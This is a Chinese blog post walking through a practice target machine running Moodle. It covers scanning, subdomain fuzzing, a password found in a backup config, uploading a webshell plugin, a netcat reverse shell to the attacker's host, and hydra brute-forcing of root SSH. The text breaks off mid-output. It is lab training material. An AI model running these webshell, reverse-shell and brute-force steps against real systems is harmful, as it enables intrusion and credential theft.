<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 8.1.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/favicon-128.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16.png">
  <link rel="mask-icon" href="/images/favicon-128.png" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhaochoudecat.github.io","root":"/","scheme":"Muse","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"always","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":true,"show_result":true,"style":"mac"},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":true,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="1.搜寻12345678┌──(root㉿kali)-[~]└─# arp-scan -l             Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43Starting arp-scan 1.10.0 with 256 hosts (https:&#x2F;&#x2F;github.com&#x2F;royhills&#x2F;">
<meta property="og:type" content="article">
<meta property="og:title" content="Moddle">
<meta property="og:url" content="https://zhaochoudecat.github.io/2026/05/03/%E9%9D%B6%E6%9C%BA/QQGroup/Moddle/index.html">
<meta property="og:site_name" content="zhaochoudecat">
<meta property="og:description" content="1.搜寻12345678┌──(root㉿kali)-[~]└─# arp-scan -l             Interface: eth0, type: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43Starting arp-scan 1.10.0 with 256 hosts (https:&#x2F;&#x2F;github.com&#x2F;royhills&#x2F;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260113221419.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260110120429.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/shell%E6%93%8D%E4%BD%9C.mp4">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260113222604.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260113223247.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260113223744.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260113230641.png">
<meta property="og:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260113230744.png">
<meta property="article:published_time" content="2026-05-02T16:00:00.000Z">
<meta property="article:modified_time" content="2026-05-02T20:03:09.804Z">
<meta property="article:author" content="zhaochoudecat">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://zhaochoudecat.github.io/assets/Pasted%20image%2020260113221419.png">

<link rel="canonical" href="https://zhaochoudecat.github.io/2026/05/03/%E9%9D%B6%E6%9C%BA/QQGroup/Moddle/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>Moddle | zhaochoudecat</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">zhaochoudecat</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://zhaochoudecat.github.io/2026/05/03/%E9%9D%B6%E6%9C%BA/QQGroup/Moddle/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/saber.jpg">
      <meta itemprop="name" content="zhaochoudecat">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="zhaochoudecat">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Moddle
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2026-05-03 00:00:00 / 修改时间：04:03:09" itemprop="dateCreated datePublished" datetime="2026-05-03T00:00:00+08:00">2026-05-03</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA/" itemprop="url" rel="index"><span itemprop="name">靶机</span></a>
                </span>
                  ，
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E9%9D%B6%E6%9C%BA/QQGroup/" itemprop="url" rel="index"><span itemprop="name">QQGroup</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h2 id="1-搜寻"><a href="#1-搜寻" class="headerlink" title="1.搜寻"></a>1.搜寻</h2><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# arp-scan -l             </span><br><span class="line">Interface: eth0, <span class="built_in">type</span>: EN10MB, MAC: 00:0c:29:dc:17:7e, IPv4: 192.168.3.43</span><br><span class="line">Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)</span><br><span class="line">192.168.3.1     18:d9:8f:c8:68:38       Huawei Device Co., Ltd.</span><br><span class="line">192.168.3.4     00:e0:4c:4d:2a:68       REALTEK SEMICONDUCTOR CORP.</span><br><span class="line">192.168.3.5     b4:2e:99:cc:28:45       GIGA-BYTE TECHNOLOGY CO.,LTD.</span><br><span class="line">192.168.3.192   08:00:27:99:e3:83       PCS Systemtechnik GmbH</span><br></pre></td></tr></table></figure>

<p>IP : <code>192.168.3.192 </code></p>
<h3 id="nmap"><a href="#nmap" class="headerlink" title="nmap"></a>nmap</h3><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# nmap -p- -A -sVC 192.168.3.192     </span><br><span class="line">Starting Nmap 7.95 ( https://nmap.org ) at 2026-01-10 11:44 CST</span><br><span class="line">Nmap scan report <span class="keyword">for</span> 192.168.3.192</span><br><span class="line">Host is up (0.00049s latency).</span><br><span class="line">Not shown: 65533 closed tcp ports (reset)</span><br><span class="line">PORT   STATE SERVICE VERSION</span><br><span class="line">22/tcp open  ssh     OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)</span><br><span class="line">| ssh-hostkey: </span><br><span class="line">|   3072 f6:a3:b6:78:c4:62:af:44:bb:1a:a0:0c:08:6b:98:f7 (RSA)</span><br><span class="line">|   256 bb:e8:a2:31:d4:05:a9:c9:31:ff:62:f6:32:84:21:9d (ECDSA)</span><br><span class="line">|_  256 3b:ae:34:64:4f:a5:75:b9:4a:b9:81:f9:89:76:99:eb (ED25519)</span><br><span class="line">80/tcp open  http    Apache httpd 2.4.62 ((Debian))</span><br><span class="line">|_http-server-header: Apache/2.4.62 (Debian)</span><br><span class="line">|_http-title: Site doesn<span class="string">&#x27;t have a title (text/html).</span></span><br><span class="line"><span class="string">MAC Address: 08:00:27:99:E3:83 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)</span></span><br><span class="line"><span class="string">Device type: general purpose|router</span></span><br><span class="line"><span class="string">Running: Linux 4.X|5.X, MikroTik RouterOS 7.X</span></span><br><span class="line"><span class="string">OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3</span></span><br><span class="line"><span class="string">OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3)</span></span><br><span class="line"><span class="string">Network Distance: 1 hop</span></span><br><span class="line"><span class="string">Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">TRACEROUTE</span></span><br><span class="line"><span class="string">HOP RTT     ADDRESS</span></span><br><span class="line"><span class="string">1   0.50 ms 192.168.3.192</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .</span></span><br><span class="line"><span class="string">Nmap done: 1 IP address (1 host up) scanned in 16.41 seconds</span></span><br></pre></td></tr></table></figure>


<h3 id="wfuzz-子域名"><a href="#wfuzz-子域名" class="headerlink" title="wfuzz 子域名"></a>wfuzz 子域名</h3><p>&#x3D;&#x3D;需要注意子域名&#x3D;&#x3D;</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">┌──(root㉿kali)-[~]</span><br><span class="line">└─# wfuzz -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u moodle.dsz -H &#x27;Host: FUZZ.moodle.dsz&#x27; --hh 20</span><br><span class="line"> /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz&#x27;s documentation for more information.</span><br><span class="line">********************************************************</span><br><span class="line">* Wfuzz 3.1.0 - The Web Fuzzer                         *</span><br><span class="line">********************************************************</span><br><span class="line"></span><br><span class="line">Target: http://moodle.dsz/</span><br><span class="line">Total requests: 4989</span><br><span class="line"></span><br><span class="line">=====================================================================</span><br><span class="line">ID           Response   Lines    Word       Chars       Payload                                                             </span><br><span class="line">=====================================================================</span><br><span class="line"></span><br><span class="line">000000001:   303        52 L     132 W      1482 Ch     &quot;www&quot;                                                               </span><br><span class="line">000000019:   200        95 L     174 W      2512 Ch     &quot;dev&quot;                                                               </span><br><span class="line"></span><br><span class="line">Total time: 0</span><br><span class="line">Processed Requests: 4989</span><br><span class="line">Filtered Requests: 4987</span><br><span class="line">Requests/sec.: 0</span><br></pre></td></tr></table></figure>
<p>或者执行<code>wfuzz -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt -u moodle.dsz -H &#39;Host: FUZZ.moodle.dsz&#39; --hh 20</code></p>
<p><strong>–hh 20</strong></p>
<ul>
<li><code>--hh</code>：全称 <code>Hide Response with specified Hash</code>，即<strong>隐藏响应体哈希值等于指定数值（此处为 20）的请求结果</strong>，本质是<strong>过滤无效响应、只保留有效结果</strong>的核心参数。</li>
<li>背后逻辑：<ol>
<li>当测试一个<strong>不存在的子域名</strong>时，目标服务器通常会返回统一的错误响应（如 404 页面、默认空白页面、统一跳转页面等），这类无效响应的内容是一致的，因此它们的响应体哈希值也相同（此处这个统一哈希值就是 20）。</li>
<li>若不添加该过滤参数，wfuzz 会输出 10 万条结果（对应字典的 10 万个条目），其中绝大多数是无效的不存在子域名，难以快速筛选有效结果。</li>
<li><code>--hh 20</code> 会屏蔽所有响应体哈希值为 20 的无效结果，只保留哈希值<strong>不等于 20</strong> 的响应（即大概率是<strong>存在的有效子域名</strong>，对应服务器返回的正常响应或不同的错误响应），极大提升枚举效率。</li>
</ol>
</li>
</ul>
<h3 id="dirsearch"><a href="#dirsearch" class="headerlink" title="dirsearch"></a>dirsearch</h3><p>&#x3D;&#x3D;改下host&#x3D;&#x3D;  </p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">╭─root@kali ~ </span><br><span class="line">╰─# cat /etc/hosts           </span><br><span class="line">127.0.0.1       localhost</span><br><span class="line">127.0.1.1       kali</span><br><span class="line"></span><br><span class="line"># The following lines are desirable for IPv6 capable hosts</span><br><span class="line">::1     localhost ip6-localhost ip6-loopback</span><br><span class="line">ff02::1 ip6-allnodes</span><br><span class="line">ff02::2 ip6-allrouters</span><br><span class="line"></span><br><span class="line">#test</span><br><span class="line">192.168.3.192  dev.moodle.dsz</span><br></pre></td></tr></table></figure>

<p>指定状态码返回200的</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">root@kali:~                                                                                                      ▶ dirsearch -u http://dev.moodle.dsz -i 200                                                                      </span><br><span class="line">/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html</span><br><span class="line">  from pkg_resources import DistributionNotFound, VersionConflict</span><br><span class="line"></span><br><span class="line">  _|. _ _  _  _  _ _|_    v0.4.3</span><br><span class="line"> (_||| _) (/_(_|| (_| )</span><br><span class="line"></span><br><span class="line">Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460</span><br><span class="line"></span><br><span class="line">Output File: /root/reports/http_dev.moodle.dsz/_26-01-13_22-01-23.txt</span><br><span class="line"></span><br><span class="line">Target: http://dev.moodle.dsz/</span><br><span class="line"></span><br><span class="line">[22:01:23] Starting: </span><br><span class="line">[22:01:48] 200 -   74MB - /backup.tar.gz</span><br><span class="line"></span><br><span class="line">Task Completed</span><br></pre></td></tr></table></figure>

<h2 id="2-分析"><a href="#2-分析" class="headerlink" title="2.分析"></a>2.分析</h2><h3 id="curl"><a href="#curl" class="headerlink" title="curl"></a>curl</h3><p>下载到本地</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">curl -O http://dev.moodle.dsz/backup.tar.gz</span><br></pre></td></tr></table></figure>
<p>解压后打开下载的文件，<code>config.php</code>中找到一个密码 <code>pzp5V2Of3akjaJrhRauR</code><br><img src="/assets/Pasted%20image%2020260113221419.png"><br>发现密码 <code>pzp5V2Of3akjaJrhRauR.</code></p>
<h3 id="login"><a href="#login" class="headerlink" title="login"></a>login</h3><p>测试过程中发现还是要改一次<code>hosts</code>文件  <code>192.168.3.192 moodle.dsz</code><br><img src="/assets/Pasted%20image%2020260110120429.png"><br><a target="_blank" rel="noopener" href="https://github.com/p0dalirius/Moodle-webshell-plugin/tree/master?tab=readme-ov-file">https://github.com/p0dalirius/Moodle-webshell-plugin/tree/master?tab=readme-ov-file</a> 上传插件，可以参考<code>github</code>上的视频</p>
<p><img src="/assets/shell%E6%93%8D%E4%BD%9C.mp4"></p>
<p>下载对应的插件后，点击上传，<code>Upload a file</code><br><img src="/assets/Pasted%20image%2020260113222604.png"></p>
<h3 id="hackbar"><a href="#hackbar" class="headerlink" title="hackbar"></a>hackbar</h3><p>执行下 <code>http://moodle.dsz/local/moodle_webshell/webshell.php?action=exec&amp;cmd=id</code> 查看是否成功</p>
<p><img src="/assets/Pasted%20image%2020260113223247.png"><br> <strong>nc反弹</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://moodle.dsz/local/moodle_webshell/webshell.php?action=exec&amp;cmd=busybox nc 192.168.3.48 1111 -e /bin/bash </span><br></pre></td></tr></table></figure>
<p><img src="/assets/Pasted%20image%2020260113223744.png"></p>
<h2 id="3-进入系统"><a href="#3-进入系统" class="headerlink" title="3.进入系统"></a>3.进入系统</h2><p><strong>搜寻有用的信息</strong></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br></pre></td><td class="code"><pre><span class="line">www-data@Moodle:/opt$ <span class="built_in">cat</span> hint.txt</span><br><span class="line"><span class="built_in">cat</span> hint.txt</span><br><span class="line">root 的凭证隐藏在众目睽睽之下</span><br><span class="line">// ^[a-zA-Z0-9]&#123;20&#125;$</span><br><span class="line"></span><br><span class="line">www-data@Moodle:/tmp$ <span class="built_in">cat</span> /etc/passwd</span><br><span class="line"><span class="built_in">cat</span> /etc/passwd</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin</span><br><span class="line">bin:x:2:2:bin:/bin:/usr/sbin/nologin</span><br><span class="line">sys:x:3:3:sys:/dev:/usr/sbin/nologin</span><br><span class="line"><span class="built_in">sync</span>:x:4:65534:<span class="built_in">sync</span>:/bin:/bin/sync</span><br><span class="line">games:x:5:60:games:/usr/games:/usr/sbin/nologin</span><br><span class="line">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin</span><br><span class="line">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin</span><br><span class="line">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin</span><br><span class="line">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin</span><br><span class="line">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin</span><br><span class="line">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin</span><br><span class="line">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin</span><br><span class="line">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin</span><br><span class="line">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin</span><br><span class="line">irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin</span><br><span class="line">gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin</span><br><span class="line">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin</span><br><span class="line">_apt:x:100:65534::/nonexistent:/usr/sbin/nologin</span><br><span class="line">systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin</span><br><span class="line">messagebus:x:104:110::/nonexistent:/usr/sbin/nologin</span><br><span class="line">sshd:x:105:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false</span><br><span class="line">kotori:x:1000:1000:,,,:/home/kotori:/bin/bash</span><br><span class="line">www-data@Moodle:/tmp$ </span><br></pre></td></tr></table></figure>

<p>用户<code>kotori</code>的密码就是 <code>pzp5V2Of3akjaJrhRauR.</code> </p>
<h3 id="方案一"><a href="#方案一" class="headerlink" title="方案一"></a>方案一</h3><p>根据<code>hint</code>进行查询</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">kotori@Moodle:~$ grep -raohE <span class="string">&#x27;\b[a-zA-Z0-9]&#123;20&#125;\b&#x27;</span> /etc /var/www /opt /home 2&gt;/dev/null &gt;&gt; a.txt</span><br><span class="line">kotori@Moodle:~$ <span class="built_in">ls</span> -l</span><br><span class="line">total 1444</span><br><span class="line">-rw-r--r-- 1 kotori kotori 1135334 Jan 13 09:46 a.txt</span><br><span class="line">-rw-r--r-- 1 kotori kotori  332111 Apr 17  2023 linpeas.sh</span><br><span class="line">-rw-r--r-- 1 root   root        44 Dec 26 22:22 user.txt</span><br></pre></td></tr></table></figure>


<blockquote>
<p>[!Info] 搜索代码解释<br><code>-r</code> <code>--recursive</code><br>递归扫描模式：遍历指定目录下的所有文件，包括子目录中的文件，不会跳过子目录</p>
<p><code>-a</code> <code>--text</code> &#x2F; <code>--binary-files=text</code><br>二进制文件文本化处理：将所有被扫描的文件（包括二进制文件，如可执行程序、图片等）都当作 ASCII 文本文件处理，避免<code>grep</code>识别为二进制文件而直接跳过，确保能提取其中的可读字母数字字符串</p>
<p><code>-o</code> <code>--only-matching</code><br>仅输出匹配内容：不输出包含匹配结果的整行内容，只提取并输出恰好匹配正则表达式的部分（这是提取 20 位字符串的关键，避免冗余内容）<br><code>-h</code> <code>--no-filename</code>屏蔽文件名输出：匹配结果中不显示该字符串来自哪个文件，仅输出匹配的字符串本身（若需要保留文件名，可去掉该参数）</p>
<p><code>-E</code> <code>--extended-regexp</code>启用扩展正则表达式：支持更简洁的正则语法（如<code>{20}</code>无需转义为<code>\{20\}</code>），简化正则编写，提升可读性</p>
</blockquote>
<blockquote>
<p>[!NOTE] ##### 正则表达式深度解析</p>
<p><code>\b[a-zA-Z0--9]{20}\b</code>是这个命令的灵魂：</p>
<ul>
<li><code>\b</code>：<strong>单词边界</strong>。确保匹配的是一个完整的“单词”，而不是更长字符串的一部分。例如，它能匹配 <code>ABC123def456ghi789XYZ</code>，但不会匹配 <code>prefix_ABC123def456ghi789XYZ_suffix</code>这样的字符串。 </li>
<li><code>[a-zA-Z0-9]</code>：一个<strong>字符组</strong>，匹配任意一个大小写英文字母或数字。</li>
<li><code>{20}</code>：一个<strong>量词</strong>，表示前面的字符组（<code>[a-zA-Z0-9]</code>）必须<strong>连续出现恰好20次</strong>。</li>
</ul>
</blockquote>
<p>将下载的<code>a.txt</code>复制到本地 用<code>hrdra</code>破解（本地机器执行）<br><code>scp kotori@192.168.3.192:~/a.txt ./</code></p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">hydra -t 4 -l root -P a.txt -I -f -vV 192.168.3.192 ssh</span><br><span class="line">Hydra v9.6 (c) 2023 by van Hauser/THC &amp; David Maciejak - Please <span class="keyword">do</span> not use <span class="keyword">in</span> military or secret service organizations, or <span class="keyword">for</span> illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).</span><br><span class="line"></span><br><span class="line">Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-01-13 22:52:46</span><br><span class="line">[DATA] max 4 tasks per 1 server, overall 4 tasks, 54060 login tries (l:1/p:54060), ~13515 tries per task</span><br><span class="line">[DATA] attacking ssh://192.168.3.192:22/</span><br><span class="line">[VERBOSE] Resolving addresses ... [VERBOSE] resolving <span class="keyword">done</span></span><br><span class="line">[INFO] Testing <span class="keyword">if</span> password authentication is supported by ssh://root@192.168.3.192:22</span><br><span class="line">[INFO] Successful, password authentication is supported by ssh://192.168.3.192:22</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 1 of 54060 [child 0] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;GetServerInformation&quot;</span> - 2 of 54060 [child 1] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 3 of 54060 [child 2] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 4 of 54060 [child 3] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;klanguageoverridesrc&quot;</span> - 5 of 54060 [child 0] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span class="string">&quot;root&quot;</span> - pass <span class="string">&quot;drmGetMinorNameForFD&quot;</span> - 6 of 54060 [child 1] (0/0)</span><br><span class="line">[ATTEMPT] target 192.168.3.192 - login <span 